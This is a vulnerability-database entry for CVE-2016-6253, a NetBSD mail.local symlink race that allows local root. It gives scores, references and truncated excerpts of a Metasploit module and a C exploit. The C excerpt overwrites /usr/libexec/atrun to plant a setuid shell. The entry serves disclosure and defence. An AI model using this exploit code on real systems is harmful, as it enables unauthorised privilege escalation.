CVE-2016-6253
Published 2017-01-20
Priority: P3 45, high, 7.8 (CVSS 3.0)
Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.53% (87.8th percentile)
mail.local in NetBSD versions 6.0 through 6.0.6, 6.1 through 6.1.5, and 7.0 allows local users to change ownership of or append data to arbitrary files on the target system via a symlink attack on the user mailbox.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netbsd | netbsd | — | — |
CVSS provenance
nvd v3.0: 7.8 HIGH, CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 7.2 HIGH, AV:L/AC:L/Au:N/C:C/I:C/A:C
No detection rules found.
Exploit-DB
NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)
exploitdb·2016-09-15
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule 'NetBSD mail.local Privilege Escalation',
      'Description' => %q{
        This module attempts to exploit a race condition in mail.local with SUID bit set on:
        NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
        NetBSD 6.1 - 6.1.5
        NetBSD 6.0 - 6.0.6
        Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'h00die ', # Module
          'akat1' # Discovery
        ],
      'DisclosureDate' => 'Jul 07 2016',
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'SessionTypes' => %w{shell meterpreter},
      'Privilege
```
Exploit-DB
NetBSD - 'mail.local(8)' Local Privilege Escalation
exploitdb·2016-07-21
---
```c
// Source: http://akat1.pl/?id=2
#include
#include
#include
#include
#include
#include
#include
#include

#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"

static int
overwrite_atrun(void)
{
    char *script = "#! /bin/sh\n"
        "cp /bin/ksh /tmp/ksh\n"
        "chmod +s /tmp/ksh\n";
    size_t size;
    FILE *fh;
    int rv = 0;

    fh = fopen(ATRUNPATH, "wb");
    if (fh == NULL) {
        rv = -1;
        goto out;
    }
    size = strlen(script);
    if (size != fwrite(script, 1, strlen(script), fh)) {
        rv = -1;
        goto out;
    }
out:
    if (fh != NULL && fclose(fh) != 0)
        rv = -1;
    return rv;
}

static int
copy_file(const char *from, const char *dest, int create)
{
    char buf[1024];
    FILE *in = NULL, *out = NULL;
    size_t size;
    int rv = 0, fd;

    in = fopen(from, "rb");
    if (create == 0
```
Metasploit
NetBSD mail.local Privilege Escalation
metasploit
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
No writeups or analysis indexed.
http://akat1.pl/?id=2
http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc
http://packetstormsecurity.com/files/138021/NetBSD-mail.local-8-Local-Root.html
http://www.rapid7.com/db/modules/exploit/unix/local/netbsd_mail_local
http://www.securityfocus.com/bid/92101
http://www.securitytracker.com/id/1036429
https://www.exploit-db.com/exploits/40141/
https://www.exploit-db.com/exploits/40385/